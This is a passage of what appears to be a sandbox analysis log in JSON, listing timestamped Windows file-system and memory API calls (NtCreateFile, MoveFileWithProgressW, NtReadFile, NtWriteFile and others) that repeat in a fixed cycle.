17:41:55,602", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,652", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:55,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:55,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:55,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,792", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,842", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 